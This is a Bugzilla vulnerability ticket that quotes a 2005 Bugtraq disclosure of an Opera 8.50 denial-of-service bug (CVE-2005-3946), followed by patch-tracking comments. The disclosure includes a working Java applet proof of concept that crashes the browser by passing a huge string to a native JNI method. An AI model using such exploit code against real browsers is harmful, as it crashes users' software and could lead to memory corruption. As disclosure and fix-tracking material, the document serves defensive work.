Bugzilla – Bug 136255
VUL-0: opera: can be crashed with java-applet due to bug in native routines
Last modified: 2009-10-13 20:41:01 UTC
Hello Lukas, we have another one.

Date: Wed, 30 Nov 2005 00:31:29 +0100
From: Marc Schoenefeld <marc.schoenefeld@gmx.org>
User-Agent: Mozilla Thunderbird 1.0.6 (Windows/20050716)
To: Bugtraq <bugtraq@securityfocus.com>
Subject: Opera 8.50 DoS with simple java applet
Envelope-To: tom@electric-sheep.org

Hi y'all,

it is possible to crash the opera 8.50 browser with a simple java applet (see below). This was observed on Win32; Linux versions may be affected, too.

This can be tested only at: http://www.illegalaccess.org/exploit/opera85/OperaApplet.html

As you can see the applet crashes at 0x67c0a54c. This is caused by a bug in a JNI routine implementing the com.opera.JSObject class. It cannot be ruled out that this bug is exploitable.

The opera guys were informed on the 21st of September, and then again on 8th of October.

Please upgrade to the new Opera 8.51, which does not expose this weakness.

Sincerely
Marc Schönefeld
marc@illegalaccess.org

> import java.applet.Applet;
> import java.awt.Graphics;
>
> import netscape.javascript.JSObject;
>
> public class OperaTest extends Applet {
>     static {
>         System.out.println("Loaded 1.2");
>     }
>
>     public void paint(Graphics g) {
>         System.out.println("start");
>         try {
>             netscape.javascript.JSObject jso = JSObject.getWindow(this);
>             System.out.println(jso.getClass());
>             // Opera's own JSObject implementation, backed by the JNI routine that crashes
>             com.opera.JSObject j = (com.opera.JSObject) jso;
>             // Build a 1,000,000-character member name to hand to the native method
>             char[] x = new char[1000000];
>             for (int y = 0; y < x.length; y++) {
>                 x[y] = 'A';
>             }
>             String z = new String(x);
>             System.out.println("after evalb");
>             j.removeMember(z);
>             System.out.println("after remove");
>         }
>         catch (Exception e) {
>             e.printStackTrace();
>         }
>     }
> }
CVE-2005-3946 Opera 8.50 allows remote attackers to cause a denial of service (crash) via a Java applet with a large string argument to the removeMember JNI method for the com.opera.JSObject class.
Will be fixed shortly by #134905
As 8.51 reportedly fixed the problem, the bug is solved; Bug 134905 has been resolved already
CVE-2005-3946: CVSS v2 Base Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)